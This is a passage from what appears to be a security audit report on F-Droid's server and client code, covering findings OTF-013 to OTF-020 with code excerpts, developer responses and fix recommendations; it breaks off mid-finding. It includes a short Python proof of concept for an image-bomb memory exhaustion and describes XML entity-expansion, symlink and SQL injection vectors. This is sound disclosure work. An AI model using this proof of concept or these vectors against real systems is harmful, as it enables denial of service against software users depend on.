  <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"># It was suggested at
  #    https://dev.guardianproject.info/projects/bazaar/wiki/FDroid_Audit
  # that a package could be crafted, such that it would use the same signing
  # key as an existing app. While it may be theoretically possible for such a
  # colliding package ID to be generated, it seems virtually impossible that
  # the colliding ID would be something that would be a) a valid package ID,
  # and b) a sane-looking ID that would make its way into the repo.
  # Nonetheless, to be sure, before publishing we check that there are no
  # collisions, and refuse to do any publishing if that's the case...
  allapps = metadata.read_metadata()
  vercodes = common.read_pkg_args(options.appid, True)
  allaliases = []
  for appid in allapps:
  m = hashlib.md5()
  m.update(appid.encode('utf-8'))
  keyalias = m.hexdigest()[:8]
  if keyalias in allaliases:
  logging.error(_("There is a keyalias collision - publishing halted"))
  sys.exit(1)
  allaliases.append(keyalias)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Denial of Service</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Either use longer ids, or don't make the ids depending on user input.</div></div>
</div>
         <a name="f15-image-bomb-can-lead-to-dos-in-fdroidserver-update-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.13</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-013 &#8212; Image Bomb Can Lead to DoS in Fdroidserver:update.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-013</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Maliciously crafted images can lead to resource exhaustion in fdroidserver.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
 <div style="margin-bottom: 5pt; line-height: 6mm;">A crafted image can fill up the RAM and harddisk of fdroidserver <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">_strip_and_copy_image()</span> (<span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">resize_icon()</span> might also be affected)</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">fdroidserver/update.py:709</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">with open(inpath, 'rb') as fp:
    in_image = Image.open(fp)
    data = list(in_image.getdata())
    out_image = Image.new(in_image.mode, in_image.size)
out_image.putdata(data)
out_image.save(outpath, "JPEG", optimize=True)</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">PoC to be used with attached lottapixels.jpg (expect your RAM to be exhausted and lotsa swapping):</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">from PIL import Image

with open('lottapixel.jpg', 'rb') as fp:
    in_image = Image.open(fp)
    data = list(in_image.getdata())
    out_image = Image.new(in_image.mode, in_image.size)
out_image.putdata(data)
out_image.save("exploded.jpg", "JPEG", optimize=True)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Resource exhaustion on fdroid</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Check for size of images before processing, set ulimit and disk quota.</div></div>
</div>
         <a name="f17-insecure-usage-of-temporary-file-directory-in-fdroidserver-docker-drozer-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.14</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-014 &#8212; Insecure Usage of Temporary File/Directory in Fdroidserver Docker/drozer.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-014</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">Insecure usage of temporary files can allow an attacker to cause a Denial of Service by linking to an important file and have it overwritten.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">A predictable filename is used to write in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">/tmp</span>.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">excerpt from docker/drozer.py:10</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">drozer = pexpect.spawn("drozer console connect")
drozer.logfile = open("/tmp/drozer_report.log", "w")</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">An adversary could create a symlink and make the export script overwrite some important file, causing a denial of service.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Difficult to trigger, but depending on file overwritten could be expensive</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Generate export files in a dedicated folder with restrictive access permissions.</div></div>
</div>
         <a name="f20-parsing-untrusted-xml-data-in-fdroidserver"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.15</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-015 &#8212; Parsing Untrusted XML Data in Fdroidserver</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-015</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Denial of Service</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">XML file parsing can be used to exhaust resources (RAM) when entity parsing is abused for the Billion Laughs and Quadratic Blowup attacks. In fdroidserver there is a couple of places where such can happen.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
  <div style="margin-bottom: 5pt; line-height: 6mm;">Fdroidserver uses the python modules <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">xml.dom.minidom</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">xml.etree.ElementTree</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">lxml</span>. All of these are vulnerable to both "quadratic blowup" and "billion laughs" attacks.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">see more info: <a href="https://docs.python.org/3/library/xml.html#xml-vulnerabilities" style="color: #e2632a;">https://docs.python.org/3/library/xml.html#xml-vulnerabilities</a></div>

<div style="margin-bottom: 5pt; line-height: 6mm;">Affected files:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/btlog.py:97
doc = xml.dom.minidom.parse(repof)</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/common.py:2940
return XMLElementTree.parse(path).getroot()</div></pre>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Location: ./fdroidserver/server.py:453
tree = fromstring(response)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Moderate: Availability can be restricted due to Denial of Service attacks</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Replace these with its defusedxml equivalent function or - only applicable to xml.* modules - make sure defusedxml.defuse_stdlib() is called.</div></div>
</div>
         <a name="f30-downloader-download-file-type-and-size-are-not-verified"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.16</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-016 &#8212;  Missing file type and size validation </div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-016</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Arbitrary file download</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"> <div style="margin-bottom: 5pt; line-height: 6mm;"> Download File Type and Size Are Not Verified </div> </div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Affected files are Files <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">net/BluetoothDownloader.java</span> and other derived classes in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">localFileDownloader.java</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">httpDownLoader.java</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">imageDownLoader.Java</span>, and its super class <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">Downloader.java</span></div>
    <div style="margin-bottom: 5pt; line-height: 6mm;">The download activity using WiFi or Bluetooth downloader classes does not check for type of file, or file size. This is intended for apk file sharing between trusted devices.</div>
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Developer comments:</span> The install process requires that the hash of the received file matches that in the signed <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">index.jar</span>. So for the exploit to install a malicious APK, the index.jar must also be compromised. The fdroid install process first validates the sha256 against what is in the signed _index.jar_, so after the download process, all files are verified the download process puts the files into a private dir, so the user cannot install them manually after download, only via _fdroidclient</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Arbitrary, potentially malicious, file can be downloaded into an unsuspecting user's device. This may allow an attacker to activate a different exploit vector.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Only allow certain types of files to be transmitted (whitelisting) if possible.</div>
    <div style="margin-bottom: 5pt; line-height: 6mm;">Limit the size of file to be transmitted, and warn the user for large files.</div>
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">The issue should be fixed in the parent class, and the subclasses should perform some content type check, to avoid malicious file/app installation on the victim device.</div>
</div>
</div>
         <a name="f31-bluetoothclient-java-insecure-rfcomm-socket-is-used-for-bluetooth-connection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.17</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-017 &#8212; Use of Insecure Communication Mechanism - BluetoothClient.java</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-017</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure communication</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothClient.java</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothClient.java, Bluetooth device creates an insecure RFComm socket. This type of connection is vulnerable to MiTM attacks, as the line key is not encrypted.</div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 29: socket = device.createInsecureRfcommSocketToServiceRecord(BluetoothConstants.fdroidUuid());</div></pre>
    <div style="margin-bottom: 5pt; line-height: 6mm;">Reference: <a href="https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)" style="color: #e2632a;">https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)</a></div>
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Developer response:</span> Ideally, F-Droid would always use encrypted connections, but with the p2p we have found that it made it a lot harder to make the exchange. We rely on a TOFUed signing key on the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">index.jar</span> to provide the integrity check. We went with unencrypted HTTP and Bluetooth to increase the likelihood that things would work.</div>
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">ROS response:</span> Sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices. </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Integrity of communication is compromised, leading to arbitrary app installation and device compromise.
    </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">An out of band key sharing mechanism, such as sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices, instead of TOFU.
    </div>
</div>
</div>
         <a name="f32-bluetoothserver-java-insecure-rfcomm-socket-used-for-bluetooth-connection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.18</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-018 &#8212; Use of Insecure Communication Mechanism - BluetoothServer.java</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-018</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Insecure communication</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Insecure RFComm Socket Is Used for Bluetooth Connection - BluetoothServer.java</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothServer.java, Bluetooth device creates an insecure RFComm socket. This type of connection is vulnerable to MiTM attacks, as the line key is not encrypted.
    </div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
        Line 72:
    serverSocket =
        adapter.listenUsingInsecureRfcommWithServiceRecord("FDroid App Swap",
        BluetoothConstants.fdroidUuid());
    </div></pre>
    <div style="margin-bottom: 5pt; line-height: 6mm;">Reference: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">https://developer.android.com/reference/android/bluetooth/BluetoothDevice.html#createInsecureRfcommSocketToServiceRecord(java.util.UUID)</span>
    </div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Integrity of communication is compromised, leading to arbitrary app installation and device compromise.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">An out of band key sharing mechanism, such as sharing a password protected file over insecure RFComm socket, containing a symmetric encryption key, can be used to exchange keys between untrusted devices, instead of TOFU.
    </div>
</div>
</div>
         <a name="f35-potential-sql-injection"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.19</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-019 &#8212; Potential SQL Injection</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-019</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>SQL Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Concatenation of strings, some of which are under attacker c.ontrol, is used to form DB queries.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Several functions in data subdirectory code use string concatenated query building to do DB operations on package name and other package supplied or repo supplied parameters.
    </div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">data/QueryBuilder.java: Lines 67-75 and lines 168-172
data/AppProvider.java: Lines 268, 700, 737, 922, 1058, 1081, 1132, 1178
data/TempApkProvider.java: Line 107
data/ApkProvider.java: Lines 315, 470,
data/FdroidProvider.java: Line 146
    </div></pre>
    <div style="margin-bottom: 5pt; line-height: 6mm;"><span style="font-weight: bold;">Response from developer: </span> yeah, these should be tightened so we don't have to trust the server.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Corruption in device based DB leading to device compromise</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">Use prepared statements for DB query preparation.</div>
    <div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate the strings with white listing before using in SQL query.</div>
</div>
</div>
         <a name="f41-app-uses-data-from-clipboard"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.20</span></div></td><td width="11.34">&nbsp;</td><td valign="top"><div style="line-height: 0.7cm;">OTF-020 &#8212; Unverified URI redirect</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #FE9920;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-020</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>URI redirect</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>Moderate</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">App Uses Data From Clipboard for external resource link.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
    <div style="margin-bottom: 5pt; line-height: 6mm;">In file ManageReposActivity.java, when AddRepo action is selected, the public method onOptionsItemSelected() at line 148 calls showAddRepo(), which appears to load an <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http:https://</span>&lt;&gt; url from clipboard if the clipboard contents look like a URL.
    </div>
    <div style="margin-bottom: 5pt; line-height: 6mm;">It may be possible for another application to populate the clipboard with malicious URL.</div>
    <pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
